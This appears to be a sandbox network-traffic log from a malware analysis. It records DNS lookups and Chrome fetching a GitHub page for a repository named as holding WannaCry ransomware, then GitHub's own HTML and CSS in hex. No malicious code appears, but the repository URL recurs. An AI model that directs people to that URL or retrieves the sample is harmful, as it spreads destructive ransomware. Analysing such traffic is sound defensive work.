                                                                                      Mar 23, 2024 15:47:26.529347897 CET1.1.1.1192.168.2.160x47f6No error (0)collector.github.comglb-db52c2cf8be544.github.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:26.530091047 CET1.1.1.1192.168.2.160xfd9cNo error (0)collector.github.comglb-db52c2cf8be544.github.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:26.530091047 CET1.1.1.1192.168.2.160xfd9cNo error (0)glb-db52c2cf8be544.github.com140.82.114.21A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.075509071 CET1.1.1.1192.168.2.160x4c50No error (0)avatars.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.075509071 CET1.1.1.1192.168.2.160x4c50No error (0)avatars.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.075509071 CET1.1.1.1192.168.2.160x4c50No error (0)avatars.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.075509071 CET1.1.1.1192.168.2.160x4c50No error (0)avatars.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.163949966 CET1.1.1.1192.168.2.160xbe3bNo error (0)api.github.com140.82.113.6A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.582674026 CET1.1.1.1192.168.2.160x105cNo error (0)github.githubassets.com185.199.110.154A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.582674026 CET1.1.1.1192.168.2.160x105cNo error (0)github.githubassets.com185.199.108.154A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.582674026 CET1.1.1.1192.168.2.160x105cNo error (0)github.githubassets.com185.199.109.154A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.582674026 CET1.1.1.1192.168.2.160x105cNo error (0)github.githubassets.com185.199.111.154A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:33.345870018 CET1.1.1.1192.168.2.160xfc2fNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:33.345870018 CET1.1.1.1192.168.2.160xfc2fNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:33.345870018 CET1.1.1.1192.168.2.160xfc2fNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:33.345870018 CET1.1.1.1192.168.2.160xfc2fNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:34.478813887 CET1.1.1.1192.168.2.160x1eNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:34.478813887 CET1.1.1.1192.168.2.160x1eNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:34.478813887 CET1.1.1.1192.168.2.160x1eNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:34.478813887 CET1.1.1.1192.168.2.160x1eNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.1649701140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:20 UTC724OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Upgrade-Insecure-Requests: 1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: navigate
                                                                                      Sec-Fetch-User: ?1
                                                                                      Sec-Fetch-Dest: document
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:20 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:20 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"2e999df221553a6425cb9a1091418301"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:20 UTC3601INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:20 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                      Data Ascii: connection: close
                                                                                      2024-03-23 14:47:20 UTC1370INData Raw: 32 32 45 43 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                      Data Ascii: 22EC<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                      2024-03-23 14:47:20 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                      Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                      2024-03-23 14:47:20 UTC1370INData Raw: 67 69 74 68 75 62 2d 31 39 63 38 35 62 65 34 61 66 39 63 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                      Data Ascii: github-19c85be4af9c.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                      2024-03-23 14:47:20 UTC1370INData Raw: 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61
                                                                                      Data Ascii: githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githuba
                                                                                      2024-03-23 14:47:20 UTC1370INData Raw: 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70
                                                                                      Data Ascii: er" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer="defer" typ
                                                                                      2024-03-23 14:47:20 UTC1370INData Raw: 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 66 62 34 62 38 64 34 30 66 32 30 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75
                                                                                      Data Ascii: type="application/javascript" src="https://github.githubassets.com/assets/element-registry-fb4b8d40f206.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modu
                                                                                      2024-03-23 14:47:20 UTC728INData Raw: 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 39 35 62 38 34 65 65 36
                                                                                      Data Ascii: -72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6
                                                                                      2024-03-23 14:47:20 UTC1370INData Raw: 35 44 31 34 0d 0a 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 74 61 73 6b 2d 6c 69 73 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6f 6e 66 6f 63 75 73 5f 74 73 2d 61 70 70 5f 61 73 73 2d 34 32 31 63 65 63 2d 39 64 65 34 32 31 33 30 31 35 61 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f
                                                                                      Data Ascii: 5D14ossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.js"></script><script cro


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.1649703185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC656OUTGET /assets/light-0eace2597ca3.css HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: text/css,*/*;q=0.1
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: style
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:21 UTC675INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 113163
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: text/css
                                                                                      Last-Modified: Wed, 24 Jan 2024 14:36:35 GMT
                                                                                      ETag: 0x8DC1CE9DE118C7E
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 1563971
                                                                                      X-Served-By: cache-iad-kiad7000125-IAD, cache-ewr18131-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 377, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: d3ab200e0c4b0a5592fb67229a154334f1a5e692
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 3a 72 6f 6f 74 2c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 6c 69 67 68 74 5d 5b 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 6c 69 67 68 74 5d 2c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 64 61 72 6b 5d 5b 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 6c 69 67 68 74 5d 7b 2f 2a 21 20 2a 2f 7d 3a 72 6f 6f 74 2c 3a 72 6f 6f 74 3a 3a 73 65 6c 65 63 74 69 6f 6e 2c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 6c 69 67 68 74 5d 5b 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 6c 69 67 68 74 5d 2c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 6c 69 67 68 74 5d 5b 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 6c 69 67 68 74 5d 3a 3a 73 65 6c 65 63 74 69 6f 6e 2c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 64
                                                                                      Data Ascii: :root,[data-color-mode=light][data-light-theme=light],[data-color-mode=dark][data-dark-theme=light]{/*! */}:root,:root::selection,[data-color-mode=light][data-light-theme=light],[data-color-mode=light][data-light-theme=light]::selection,[data-color-mode=d
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 67 72 61 79 2d 35 3a 20 23 36 65 37 37 38 31 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 67 72 61 79 2d 36 3a 20 23 35 37 36 30 36 61 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 67 72 61 79 2d 37 3a 20 23 34 32 34 61 35 33 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 67 72 61 79 2d 38 3a 20 23 33 32 33 38 33 66 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 67 72 61 79 2d 39 3a 20 23 32 34 32 39 32 66 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 30 3a 20 23 64 64 66 34 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 31 3a 20 23 62 36 65 33 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62 6c 75 65 2d 32 3a 20 23 38 30 63 63 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 62
                                                                                      Data Ascii: --color-scale-gray-5: #6e7781;--color-scale-gray-6: #57606a;--color-scale-gray-7: #424a53;--color-scale-gray-8: #32383f;--color-scale-gray-9: #24292f;--color-scale-blue-0: #ddf4ff;--color-scale-blue-1: #b6e3ff;--color-scale-blue-2: #80ccff;--color-scale-b
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 20 23 35 34 61 65 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 3a 20 23 31 46 32 33 32 38 3b 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 3a 20 23 36 35 36 64 37 36 3b 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 3a 20 23 36 65 37 37 38 31 3b 2d 2d 63 6f 6c 6f 72 2d 66 67 2d 6f 6e 2d 65 6d 70 68 61 73 69 73 3a 20 23 66 66 66 66 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 64 65 66 61 75 6c 74 3a 20 23 66 66 66 66 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 6f 76 65 72 6c 61 79 3a 20 23 66 66 66 66 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 69 6e 73 65 74 3a 20 23 66 36 66 38 66 61 3b 2d 2d 63 6f 6c 6f 72 2d 63 61 6e 76 61 73 2d 73 75 62 74 6c 65 3a 20 23 66 36 66 38 66 61 3b 2d 2d 63 6f 6c 6f 72 2d
                                                                                      Data Ascii: #54aeff;--color-fg-default: #1F2328;--color-fg-muted: #656d76;--color-fg-subtle: #6e7781;--color-fg-on-emphasis: #ffffff;--color-canvas-default: #ffffff;--color-canvas-overlay: #ffffff;--color-canvas-inset: #f6f8fa;--color-canvas-subtle: #f6f8fa;--color-
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 65 72 3a 20 72 67 62 61 28 33 31 2c 33 35 2c 34 30 2c 30 2e 31 35 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 73 65 6c 65 63 74 65 64 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 31 70 78 20 30 20 72 67 62 61 28 37 36 2c 30 2c 32 30 2c 30 2e 32 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 64 69 73 61 62 6c 65 64 2d 74 65 78 74 3a 20 72 67 62 61 28 32 30 37 2c 33 34 2c 34 36 2c 30 2e 35 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 64 69 73 61 62 6c 65 64 2d 62 67 3a 20 23 66 36 66 38 66 61 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 64 61 6e 67 65 72 2d 64 69 73 61 62 6c 65 64 2d 63 6f 75 6e 74 65 72 2d 62 67 3a 20 72 67 62 61 28 32 30 37 2c 33 34 2c 34 36 2c 30 2e 30 35 29 3b 2d 2d 63 6f 6c 6f 72 2d
                                                                                      Data Ascii: er: rgba(31,35,40,0.15);--color-btn-danger-selected-shadow: inset 0 1px 0 rgba(76,0,20,0.2);--color-btn-danger-disabled-text: rgba(207,34,46,0.5);--color-btn-danger-disabled-bg: #f6f8fa;--color-btn-danger-disabled-counter-bg: rgba(207,34,46,0.05);--color-
                                                                                      2024-03-23 14:47:21 UTC16384INData Raw: 30 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 2e 32 35 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 68 6f 76 65 72 2d 62 67 3a 20 23 66 33 66 34 66 36 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 68 6f 76 65 72 2d 62 6f 72 64 65 72 3a 20 72 67 62 61 28 33 31 2c 33 35 2c 34 30 2c 30 2e 31 35 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 61 63 74 69 76 65 2d 62 67 3a 20 68 73 6c 61 28 32 32 30 2c 31 34 25 2c 39 33 25 2c 31 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 61 63 74 69 76 65 2d 62 6f 72 64 65 72 3a 20 72 67 62 61 28 33 31 2c 33 35 2c 34 30 2c 30 2e 31 35 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 73 65 6c 65 63 74 65 64 2d 62 67 3a 20 68 73 6c 61 28 32 32 30 2c 31 34 25 2c 39 34 25 2c 31 29 3b 2d 2d 63 6f 6c 6f 72 2d 62 74 6e 2d 63 6f 75 6e 74 65 72
                                                                                      Data Ascii: 0 rgba(255,255,255,0.25);--color-btn-hover-bg: #f3f4f6;--color-btn-hover-border: rgba(31,35,40,0.15);--color-btn-active-bg: hsla(220,14%,93%,1);--color-btn-active-border: rgba(31,35,40,0.15);--color-btn-selected-bg: hsla(220,14%,94%,1);--color-btn-counter
